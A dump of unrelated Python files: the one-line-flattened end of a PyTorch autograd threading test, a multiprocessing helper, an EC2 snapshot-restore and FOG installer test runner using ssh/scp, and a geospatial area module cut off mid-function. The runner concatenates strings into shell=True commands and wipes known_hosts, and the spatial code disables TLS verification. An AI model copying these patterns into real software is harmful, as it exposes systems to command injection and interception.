x_no_retain ** 2 self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5) # at least one thread will be success in this case, all other threads should raise # with the error that throw to user to recommend them specify retain_graph=True self.assertTrue(success_vs_raises[0] >= 1) # multiple backward with python threads, no error with retain_graph=True def train_fn_retain_graph(x): y = x + x ** 2 y.sum().backward(retain_graph=True) x_retain = torch.ones(5, 5, requires_grad=True) y_retain = x_retain + x_retain ** 2 self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5) # result should equal to num_thread * gradients self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1)) def test_fork_join_in_middle(self): # multiple backward with jit threads (fork/join primitive) # similar to test_python_thread_in_middle, we test with retain_graph=False/True # Case 1: multiple grad() calls with jit threads, retain_graph=False # should throw error in some threads with no retain_graph. 
@torch.jit.script def train_fn_jit_no_retain(middle, orig_x): y = middle + middle ** 2 return torch.autograd.grad([y.sum()], [orig_x]) @torch.jit.script def train_fn_fork_join_calls_no_retain(x): y_no_retain = (x + 3) * (x + 4) * 0.5 fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x) grad_hat = train_fn_jit_no_retain(y_no_retain, x) grad = torch.jit._wait(fut) return grad, grad_hat try: train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True)) except RuntimeError as error: self.assertRegex(str(error), "Specify retain_graph=True") # Case 2: no error with retain_graph=True @torch.jit.script def train_fn_jit_retain(middle, orig_x): y = middle + middle ** 2 return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True) @torch.jit.script def train_fn_fork_join_calls_retain(x): y_retain = (x + 3) * (x + 4) * 0.5 fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x) fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x) grad = train_fn_jit_retain(y_retain, x) grad1 = torch.jit._wait(fut1) grad2 = torch.jit._wait(fut2) return grad, grad1, grad2 grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True)) self.assertEqual(grad, grad1) self.assertEqual(grad, grad2) def test_preserve_backtrace(self): class Foo(torch.autograd.Function): @staticmethod def forward(ctx, input): return input @staticmethod def backward(ctx, *grad): raise ValueError("something") t = torch.rand(10, requires_grad=True) try: Foo.apply(t).sum().backward() except Exception: import traceback tb = sys.exc_info()[2] tb_str = "\n".join(traceback.format_tb(tb)) self.assertTrue('raise ValueError("something")' in tb_str) # TODO(@anjali411): add an OpInfo based test for torch.cat # Issue: https://github.com/pytorch/pytorch/issues/51627 def test_cat_r_to_c(self): inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True) inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True) def fn(x1, x2): return torch.cat((x1, x2), dim=-1) torch.autograd.gradcheck(fn, [inp_r, inp_c]) torch.autograd.gradcheck(fn, [inp_c, inp_r]) for test in method_tests(): add_test(*test) # e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA instantiate_device_type_tests( TestAutogradDeviceType, globals(), except_for=None ) if __name__ == '__main__': run_tests()
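# --- Illustrative sketch, not part of the original test suite ---
# The TestMultithreadAutograd cases above rely on concurrent backward() calls
# accumulating into the same leaf .grad, so a shared input ends up with
# num_threads times the single-thread gradient. A minimal standalone
# reproduction of that invariant (hypothetical helper, never called by the
# tests; it assumes only torch and threading, both already imported here):
def _demo_multithreaded_grad_accumulation(num_threads=10):
    x = torch.ones(5, 5, requires_grad=True)

    def worker():
        y = (x + 3) * (x + 4) * 0.5  # dy/dx = x + 3.5
        y.sum().backward()

    workers = [threading.Thread(target=worker) for _ in range(num_threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    # Each backward() adds (x + 3.5) into x.grad; with a shared leaf the
    # contributions accumulate rather than overwrite each other.
    assert torch.allclose(x.grad, num_threads * (x + 3.5))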
multiprocess.py
import multiprocessing


def _SpawnProcess(func, args, num_processes):
    # Start num_processes processes, all running func(*args), and return them.
    processes = []
    for _ in range(num_processes):
        p = multiprocessing.Process(target=func, args=args)
        p.start()
        processes.append(p)
    return processes


def SpawnProcesses(funcs, args, num_processes, join=True):
    # funcs may be a single callable or a list of callables; when it is a list,
    # args and num_processes must be parallel lists of the same length.
    if isinstance(funcs, list):
        assert isinstance(args, list), 'Expected args to be list'
        assert isinstance(num_processes, list), 'Expected num_processes to be list'
        processes = []
        for func, arg, num_process in zip(funcs, args, num_processes):
            processes += _SpawnProcess(func, arg, num_process)
    else:
        processes = _SpawnProcess(funcs, args, num_processes)
    if not join:
        return processes
    for process in processes:
        process.join()
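# --- Illustrative usage sketch, not part of the original module ---
# _demo_worker is a hypothetical stand-in; any picklable callable works.
def _demo_worker(job_id, prefix):
    print(prefix, job_id)


if __name__ == "__main__":
    # One callable fanned out over three processes; args is the positional
    # argument tuple passed to every process. join defaults to True, so the
    # call blocks until all workers exit.
    SpawnProcesses(_demo_worker, ("job-1", "demo"), 3)

    # Lists fan out several callables at once: parallel lists of callables,
    # argument tuples and process counts.
    SpawnProcesses([_demo_worker, _demo_worker], [("a", "x"), ("b", "y")], [2, 1])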
functions.py
import boto3 import time import sys import datetime from settings import * import os from threading import Thread import subprocess cwd = os.path.dirname(os.path.realpath(__file__)) ec2resource = boto3.resource('ec2') ec2client = boto3.client('ec2') def add_ssh_identities(): known_hosts_content = "" subprocess.call("echo '' > ~/.ssh/known_hosts", shell=True) for address in dnsAddresses: # Kick the tires a bit, this helps the remote host to 'wake up', and for a network path to be learned by involved routers. for i in range(0,7): subprocess.call(timeout + " " + sshTime + " " + ssh_keyscan + " -H " + address + " > /dev/null 2>&1", shell=True) time.sleep(wait) time.sleep(wait) subprocess.call(timeout + " " + sshTime + " " + ssh_keyscan + " -H " + address + " >> ~/.ssh/known_hosts 2> /dev/null", shell=True) def read_file(path): if os.path.isfile(path): with open(path, 'r') as content_file: try: return content_file.read() except Exception as e: return e else: return "The file '" + path + "' does not exist." def append_file(path,content): try: with open(path, 'a') as content_file: content_file.write(content) except Exception as e: print "Exception appending to '" + str(path) + "'" print "Exception: " + str(e) def overwrite_file(path,content): try: with open(path, 'w') as content_file: content_file.write(content) except Exception as e: print "Exception overwriting '" + str(path) + "'" print "Exception: " + str(e) def make_dir(directory): if not os.path.exists(directory): os.makedirs(directory) def complete_threads(threads): # Start all the threads. for x in threads: x.start() # Wait for all threads to exit. for x in threads: x.join() def get_instance(name,value): # This assumes one match # Only for instances that are not terminated. response = ec2client.describe_instances( Filters=[ { 'Name': 'tag:' + name, 'Values': [value] }, { 'Name':'instance-state-name', 'Values':['pending','running','shutting-down','stopping','stopped'] } ] ) instance = ec2resource.Instance(response["Reservations"][0]["Instances"][0]["InstanceId"]) return instance def get_instance_volume(instance): # This assumes one volume. try: return ec2resource.Volume(instance.block_device_mappings[0]["Ebs"]["VolumeId"]) except: return None def wait_until_stopped(instance): while True: instance.reload() if instance.state["Name"] == "stopped": break else: time.sleep(wait) return def wait_until_running(instance): while True: instance.reload() if instance.state["Name"] == "running": break else: time.sleep(wait) return def create_snapshot(volume,name_tag): snapshot = volume.create_snapshot() snapshot.create_tags( Tags=[ { 'Key': 'Name', 'Value': name_tag } ] ) snapshot.create_tags(Tags=globalTags) while True: snapshot.reload() if snapshot.state == "completed": break else: time.sleep(wait) return snapshot def delete_snapshots(name,value): # This deletes all matching snapshots. response = ec2client.describe_snapshots( Filters=[ { 'Name': 'tag:' + name, 'Values': [value] } ] ) for snapshotDict in response["Snapshots"]: snapshot = ec2resource.Snapshot(snapshotDict["SnapshotId"]) snapshot.delete() def get_snapshot(name,value): # Assumes one match. 
response = ec2client.describe_snapshots( Filters=[ { 'Name': 'tag:' + name, 'Values': [value] } ] ) snapshot = ec2resource.Snapshot(response["Snapshots"][0]["SnapshotId"]) return snapshot def restore_clean_snapshots(): threads = [] for OS in OSs: instance = get_instance("Name","fogtesting-" + OS) snapshot = get_snapshot("Name",OS + '-clean') if OS == "debian10": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/xvda"))) elif OS == "centos7": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "rhel7": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "fedora30": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "arch": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "ubuntu18_04": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) else: # Here, just exit because it's better to know something is wrong early than to dig to figure it out why later. print "Don't know how to handle OS: '" + str(OS) + "', exiting." sys.exit(1) complete_threads(threads) def restore_snapshot_to_instance(snapshot,instance,device): """ Stop the instance detach and delete the old volume. Create a new volume Attach the new volume Start the instance """ instance.stop(Force=True) wait_until_stopped(instance) oldVolume = get_instance_volume(instance) if oldVolume is not None: oldVolume.detach_from_instance(Force=True) while True: oldVolume.reload() if oldVolume.state == "available": break else: time.sleep(wait) oldVolume.delete() newVolume = ec2client.create_volume(SnapshotId=snapshot.id,AvailabilityZone=zone,VolumeType='standard') newVolume = ec2resource.Volume(newVolume["VolumeId"]) newVolume.create_tags(Tags=instance.tags) while True: newVolume.reload() if newVolume.state == "available": break else: time.sleep(wait) instance.attach_volume(VolumeId=newVolume.id,Device=device) while True: newVolume.reload() if newVolume.state == "in-use": break else: time.sleep(wait) instance.modify_attribute(BlockDeviceMappings=[{'Ebs': {'DeleteOnTermination': True}, 'DeviceName': device}]) instance.start() wait_until_running(instance) def update_os(branch,OS,now,instance): # Make required directory. make_dir(os.path.join(webdir,OS)) # Write -1 to result file locally to indicate it didn't finish in time. with open(os.path.join(statusDir,OS + "." + branch + ".patch_result"), 'w') as content_file: content_file.write("-1") # Send the update script. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + os.path.join(cwd,'updateOS.sh') + " " + OS + ":/root/updateOS.sh" subprocess.call(command, shell=True) # Get starting time d1 = datetime.datetime.now() # Run the remote update script. command = timeout + " " + patchTimeout + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "/root/./updateOS.sh"' subprocess.call(command, shell=True) # Get ending time. d2 = datetime.datetime.now() # Calculate duration. duration = d2 - d1 duration = str(datetime.timedelta(seconds=duration.total_seconds())) # Remove miliseconds, we don't care that much about miliseconds and it takes up realestate on the webpage. duration = duration.split('.')[0] # Write duration to file. with open(os.path.join(statusDir,OS + "." 
+ branch + ".patch_duration"), 'w') as content_file: content_file.write(duration) # Get the patch_result command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/patch_result " + os.path.join(statusDir,OS + "." + branch + ".patch_result") subprocess.call(command, shell=True) # Get the patch_output command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/patch_output.log " + os.path.join(webdir,OS,now + "_patch_output.log") subprocess.call(command, shell=True) # Reboot. command = timeout + " " + patchTimeout + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "( sleep 5;reboot ) & " > /dev/null 2>&1' subprocess.call(command, shell=True) # Wait for the reboot to complete before proceeding. time.sleep(bootTime) def runTest(branch,OS,now,instance): make_dir(os.path.join(webdir,OS)) commandsLog = os.path.join(statusDir,OS + "." + branch + ".remote_commands") if os.path.isfile(commandsLog): os.remove(commandsLog) # Write -1 locally to indicate it didn't finish in time. with open(os.path.join(statusDir,OS + "." + branch + ".result"), 'w') as content_file: content_file.write("-1") # print "Kickin tires" # Kick the tires a bit, this helps the remote host to 'wake up', and for a network path to be learned by involved routers. command = timeout + " " + sshTime + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "echo wakeup" > /dev/null 2>&1' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "echo get ready" > /dev/null 2>&1' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Scp script to remote box" # Scp a script onto the remote box that we will later call. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + os.path.join(cwd,'installBranch.sh') + " " + OS + ":/root/installBranch.sh" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # Get starting time d1 = datetime.datetime.now() # print "Starting installer" # Start the fog installer. command = timeout + " " + fogTimeout + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "/root/./installBranch.sh ' + branch + '"' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # Get ending time. d2 = datetime.datetime.now() # Calculate duration. duration = d2 - d1 duration = str(datetime.timedelta(seconds=duration.total_seconds())) # Remove miliseconds, we don't care that much about miliseconds and it takes up realestate on the webpage. duration = duration.split('.')[0] # Write duration to file. with open(os.path.join(statusDir,OS + "." + branch + ".duration"), 'w') as content_file: content_file.write(duration) # print "Getting result file" # Get the result file. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/result " + os.path.join(statusDir,OS + "." + branch + ".result") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # This should send the result code of the attempt to something like /tmp/debian9.master.result # print "Getting output file" # Get the output file. 
command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/output " + os.path.join(webdir,OS,now + "_output.log") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting fog log file" # Get the fog log. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/git/fogproject/bin/error_logs/fog_error* " + os.path.join(webdir,OS,now + "_fog_error.log") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting apache logs" # Get the apache error logs. Can be in only two places. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/httpd/error_log " + os.path.join(webdir,OS,now + "_apache.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/apache2/error.log " + os.path.join(webdir,OS,now + "_apache.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting php-fpm logs" # Get php-fpm logs. Can be in several places... command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php-fpm/www-error.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php-fpm/error.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php*-fpm.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php-fpm/php-fpm.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting commit" # Get the commit the remote node was using, just as a sainity check. command = timeout + " " + sshTime + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "cd /root/git/fogproject;git rev-parse HEAD > /root/commit"' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/commit " + os.path.join(statusDir,OS + "." + branch + ".commit") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # This should send just the commit that was used in the test to something like /tmp/debian9.master.commit # Kill the instance. instance.stop(Force=True) # print "Reading commit" # Read the commit. commit = read_file(os.path.join(statusDir,OS + "." + branch + ".commit")) # print "Rebuilding log" # Rebuild the log file to have information at the top of it. log = "Date=" + now + "\n" log = log + "Branch=" + branch + "\n" log = log + "Commit=" + commit # The commit comes back with a line feed in it. 
log = log + "OS=" + OS + "\n" log = log + "##### Begin Log #####\n" log = log + read_file(os.path.join(webdir,OS,now + "_fog_error.log")) # print "Writing log" # Write the new log. with open(os.path.join(webdir,OS,now + "_fog_error.log"), 'w') as content_file: content_file.write(log)
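# --- Illustrative sketch, not part of the original script ---
# restore_clean_snapshots() builds one Thread per OS and hands the list to
# complete_threads(), which starts and then joins them all. The same pattern
# can run the installer test on every OS in parallel; the function name below
# is hypothetical and `branch`/`now` are assumed to be supplied by the caller
# (they are not defined in this module).
def run_tests_for_all_oses(branch, now):
    threads = []
    for OS in OSs:
        instance = get_instance("Name", "fogtesting-" + OS)
        threads.append(Thread(target=runTest, args=(branch, OS, now, instance)))
    complete_threads(threads)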
spatial.py
import bottle #import os import sys import requests import json import pyproj import traceback import math #from datetime import datetime from multiprocessing import Process, Pipe from shapely.geometry import shape,MultiPoint,Point,mapping from shapely.geometry.polygon import Polygon from shapely.geometry.multipolygon import MultiPolygon from shapely.geometry.collection import GeometryCollection from shapely.geometry.base import BaseGeometry from shapely import ops from functools import partial from . import settings from . import kmi proj_aea = lambda geometry: pyproj.Proj("+proj=aea +lat_1=-17.5 +lat_2=-31.5 +lat_0=0 +lon_0=121 +x_0=5000000 +y_0=10000000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs") def exportGeojson(feat,fname): if isinstance(feat,BaseGeometry): geojson = { "type":"FeatureCollection", "features":[ { "type":"Feature", "geometry":mapping(feat), "properties":{} } ] } elif isinstance(feat,tuple): geojson = { "type":"FeatureCollection", "features":[ { "type":"Feature", "geometry":mapping(feat[0]), "properties":feat[1] or {} } ] } elif isinstance(feat,list): features = [] geojson = { "type":"FeatureCollection", "features":features } for f in feat: if isinstance(f,BaseGeometry): features.append({ "type":"Feature", "geometry":mapping(f), "properties":{} }) elif isinstance(f,tuple): features.append({ "type":"Feature", "geometry":mapping(f[0]), "properties":f[1] or {} }) else: raise Exception("Unsupported type({}.{})".format(f.__class__.__module__,f.__class__.__name__)) else: raise Exception("Unsupported type({}.{})".format(feat.__class__.__module__,feat.__class__.__name__)) with open(fname,'w') as f: f.write(json.dumps(geojson,indent=True)) return fname proj_wgs84 = pyproj.Proj(init='epsg:4326') def buffer(lon, lat, meters,resolution=16): """ Create a buffer around a point """ # Azimuthal equidistant projection aeqd_proj = '+proj=aeqd +lat_0={} +lon_0={} +x_0=0 +y_0=0' project = partial( pyproj.transform, pyproj.Proj(aeqd_proj.format(lat, lon)), proj_wgs84) buf = Point(0, 0).buffer(meters,resolution=resolution) # distance in metres return ops.transform(project, buf).exterior.coords[:] def getShapelyGeometry(feature): if not feature["geometry"]: return None elif feature["geometry"]["type"] == "GeometryCollection": return GeometryCollection([shape(g) for g in feature["geometry"]["geometries"]]) else: return shape(feature["geometry"]) def transform(geometry,src_proj="EPSG:4326",target_proj='aea'): if src_proj == target_proj: return geometry else: if src_proj == 'aea': src_proj = proj_aea(geometry) else: src_proj = pyproj.Proj(init=src_proj) if target_proj == 'aea': target_proj = proj_aea(geometry) else: target_proj = pyproj.Proj(init=target_proj) return ops.transform( partial( pyproj.transform, src_proj, #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area target_proj ), geometry ) def getGeometryArea(geometry,unit,src_proj="EPSG:4326"): """ Get polygon's area using albers equal conic area """ if src_proj == 'aea': geometry_aea = geometry else: geometry_aea = ops.transform( partial( pyproj.transform, pyproj.Proj(init=src_proj), #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area proj_aea(geometry) ), geometry ) data = geometry_aea.area if unit == "ha" : return data / 10000.00 elif unit == "km2": return data / 1000000.00 else: return data degrees2radians = math.pi / 180 radians2degrees = 180 
/math.pi def getBearing(p1,p2): lon1 = degrees2radians * p1.x lon2 = degrees2radians * p2.x lat1 = degrees2radians * p1.y lat2 = degrees2radians * p2.y a = math.sin(lon2 - lon1) * math.cos(lat2) b = math.cos(lat1) * math.sin(lat2) - math.sin(lat1) * math.cos(lat2) * math.cos(lon2 - lon1); bearing = radians2degrees * math.atan2(a, b); return bearing if bearing >= 0 else bearing + 360 directions = { 4:[360/4,math.floor(360 / 8 * 100) / 100,["N","E","S","W"]], 8:[360/8,math.floor(360 / 16 * 100) / 100,["N","NE","E","SE","S","SW","W","NW"]], 16:[360/16,math.floor(360 / 32 * 100) / 100,["N","NNE","NE","ENE","E","ESE","SE","SSE","S","SSW","SW","WSW","W","WNW","NW","NNW"]], 32:[360/32,math.floor(360 / 64 * 100) / 100,["N","NbE","NNE","NEbN","NE","NEbE","ENE","EbN","E","EbS","ESE","SEbE","SE","SEbS","SSE","SbE","S","SbW","SSW","SWbS","SW","SWbW","WSW","WbS","W","WbN","WNW","NWbW","NW","NWbN","NNW","NbW"]], } def getDirection(bearing,mode = 16): mode = mode or 16 if mode not in directions: mode = 16 index = int((math.floor(bearing / directions[mode][0]) + 0 if ((round(bearing % directions[mode][0],2) <= directions[mode][1])) else 1) % mode) return directions[mode][2][index] def getDistance(p1,p2,unit="m",p1_proj="EPSG:4326",p2_proj="EPSG:4326"): if p1_proj == 'aea': p1_aea = p1 else: p1_aea = ops.transform( partial( pyproj.transform, pyproj.Proj(init=p1_proj), #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area proj_aea(p1) ), p1 ) if p2_proj == 'aea': p2_aea = p2 else: p2_aea = ops.transform( partial( pyproj.transform, pyproj.Proj(init=p2_proj), #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area proj_aea(p2) ), p2 ) data = p1_aea.distance(p2_aea) if unit == "km" : return data / 1000.00 else: return data #return polygon or multipolygons if have, otherwise return None def extractPolygons(geom): if not geom: return None elif isinstance(geom,Polygon) or isinstance(geom,MultiPolygon): return geom elif isinstance(geom,GeometryCollection): result = None for g in geom: p = extractPolygons(g) if not p: continue elif not result: result = p elif isinstance(result,MultiPolygon): result = [geom1 for geom1 in result.geoms] if isinstance(p,Polygon): result.append(p) result = MultiPolygon(result) else: for geom1 in p.geoms: result.append(geom1) result = MultiPolygon(result) else: if isinstance(p,Polygon): result = MultiPolygon([result,p]) else: result = [result] for geom1 in p.geoms: result.append(geom1) result = MultiPolygon(result) return result else: return None def extractPoints(geom): if isinstance(geom,Point) or isinstance(geom,MultiPoint): return geom elif isinstance(geom,GeometryCollection): result = None for g in geom: p = extractPoints(g) if not p: continue elif not result: result = p elif isinstance(result,MultiPoint): result = [geom1 for geom1 in result.geoms] if isinstance(p,Point): result.append(p) result = MultiPoint(result) else: for geom1 in p.geoms: result.append(geom1) result = MultiPoint(result) else: if isinstance(p,Point): result = MultiPoint([result,p]) else: result = [result] for geom1 in p.geoms: result.append(geom1) result = MultiPoint(result) return result else: return None def retrieveFeatures(url,session_cookies): res = requests.get(url,verify=False,cookies=session_cookies) res.raise_for_status() return res.json() def checkOverlap(session_cookies,feature,options,logfile): # needs gdal 1.10+ layers = 
options["layers"] geometry = extractPolygons(getShapelyGeometry(feature)) if not geometry : return features = {} #retrieve all related features from layers for layer in layers: if layer.get('cqlfilter'): layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter']) else: layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2]) features[layer["id"]] = retrieveFeatures(layer_url, session_cookies)["features"] for layer_feature in features[layer["id"]]: layer_geometry = getShapelyGeometry(layer_feature) layer_feature["geometry"] = layer_geometry #check whether the features from different layers are overlap or not layergroup_index1 = 0 while layergroup_index1 < len(layers) - 1: layer1 = layers[layergroup_index1] layergroup_index1 += 1 layer_features1 = features[layer1["id"]] #check whether layer's features are overlap or not. feature_index1 = 0 while feature_index1 < len(layer_features1): feature1 = layer_features1[feature_index1] feature_index1 += 1 feature_geometry1 = feature1["geometry"] if not isinstance(feature_geometry1,Polygon) and not isinstance(feature_geometry1,MultiPolygon): continue layergroup_index2 = layergroup_index1 while layergroup_index2 < len(layers): layer2 = layers[layergroup_index2] layergroup_index2 += 1 layer_features2 = features[layer2["id"]] feature_index2 = 0 while feature_index2 < len(layer_features2): feature2 = layer_features2[feature_index2] feature_index2 += 1 feature_geometry2 = feature2["geometry"] feature_geometry1 = feature1["geometry"] if not isinstance(feature_geometry2,Polygon) and not isinstance(feature_geometry2,MultiPolygon): continue intersections = extractPolygons(feature_geometry1.intersection(feature_geometry2)) if not intersections: continue layer1_pk = layer1.get("primary_key") layer2_pk = layer2.get("primary_key") if layer1_pk: if isinstance(layer1_pk,basestring): feat1 = "{}({}={})".format(layer1["layerid"],layer1_pk,feature1["properties"][layer1_pk]) else: feat1 = "{}({})".format(layer1["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature1["properties"].iteritems() if k in layer1_pk ])) else: feat1 = "{}({})".format(layer1["layerid"],json.dumps(feature1["properties"])) if layer2_pk: if isinstance(layer2_pk,basestring): feat2 = "{}({}={})".format(layer2["layerid"],layer2_pk,feature2["properties"][layer2_pk]) else: feat2 = "{}({})".format(layer2["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature2["properties"].iteritems() if k in layer2_pk ])) else: feat2 = "{}({})".format(layer2["layerid"],json.dumps(feature2["properties"])) msg = "intersect({}, {}) = {} ".format( feat1,feat2, intersections ) with open(logfile,"a") as f: f.write(msg) f.write("\n") def calculateArea(feature,session_cookies,options): """ return:{ status { "invalid" : invalid message; "failed" : failed message; "overlapped" : overlap message } data: { total_area: 100 //exist if status_code = 1 other_area: 10 //exist if status_code = 1 and len(layers) > 0 layers: { //exist if status_code = 1 and len(layers) > 0 layer id: { total_area: 12 areas:[ {area:1, properties:{ name:value }} ] } } } } The reason to calculate the area in another 
process is to releace the memory immediately right after area is calculated. """ if not settings.CALCULATE_AREA_IN_SEPARATE_PROCESS: return _calculateArea(feature,session_cookies,options,False) parent_conn,child_conn = Pipe(True) p = Process(target=calculateAreaInProcess,args=(child_conn,)) p.daemon = True p.start() parent_conn.send([feature,session_cookies,options]) result = parent_conn.recv() parent_conn.close() #p.join() #print("{}:get the area result from other process".format(datetime.now())) return result def calculateAreaInProcess(conn): feature,session_cookies,options = conn.recv() result = _calculateArea(feature,session_cookies,options,True) if "overlap_logfile" in result: overlapLogfile = result["overlap_logfile"] del result["overlap_logfile"] else: overlapLogfile = None conn.send(result) conn.close() #print("{}:Calculating area finiahed".format(datetime.now())) #import time #time.sleep(30) #if overlapLogfile: # try: # if os.path.exists(overlapLogfile): # os.remove(overlapLogfile) # except: # pass # checkOverlap(session_cookies,feature,options,overlapLogfile) #print("{}:subprocess finished".format(datetime.now())) def calculateFeatureArea(feature,src_proj="EPSG:4326",unit='ha'): return calculateGeometryArea(getShapelyGeometry(feature),src_proj=src_proj,unit=unit) def calculateGeometryArea(geometry,src_proj="EPSG:4326",unit='ha'): geometry = extractPolygons(geometry) if not geometry : return 0 valid,msg = geometry.check_valid if not valid: print("geometry is invalid.{}", msg) geometry_aea = transform(geometry,src_proj=src_proj,target_proj='aea') return getGeometryArea(geometry_aea,unit,'aea') def _calculateArea(feature,session_cookies,options,run_in_other_process=False): # needs gdal 1.10+ layers = options["layers"] unit = options["unit"] or "ha" overlap = options["layer_overlap"] or False merge_result = options.get("merge_result",False) area_data = {} status = {} result = {"status":status,"data":area_data} total_area = 0 total_layer_area = 0 geometry = extractPolygons(getShapelyGeometry(feature)) if not geometry : area_data["total_area"] = 0 return result #before calculating area, check the polygon first. 
#if polygon is invalid, throw exception valid,msg = geometry.check_valid if not valid: status["invalid"] = msg geometry_aea = transform(geometry,target_proj='aea') try: area_data["total_area"] = getGeometryArea(geometry_aea,unit,'aea') except: traceback.print_exc() if "invalid" in status: status["failed"] = "Calculate total area failed.{}".format("\r\n".join(status["invalid"])) else: status["failed"] = "Calculate total area failed.{}".format(traceback.format_exception_only(sys.exc_type,sys.exc_value)) return result if not layers: return result if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: #export geometry for debug properties = feature["properties"] properties.update({"area":area_data["total_area"]}) exportGeojson((geometry_aea,properties),"/tmp/feature.geojson") for layer in layers: if "layerid" not in layer and "id" not in layer: raise Exception("Both 'id' and 'layerid' are missing in layer declaration") elif "layerid" not in layer: layer["layerid"] = layer["id"] elif "id" not in layer: layer["id"] = layer["layerid"] area_data["layers"] = {} areas_map = {} if merge_result else None for layer in layers: try: layer_area_data = [] total_layer_area = 0 area_data["layers"][layer["id"]] = {"areas":layer_area_data} if layer.get('cqlfilter'): 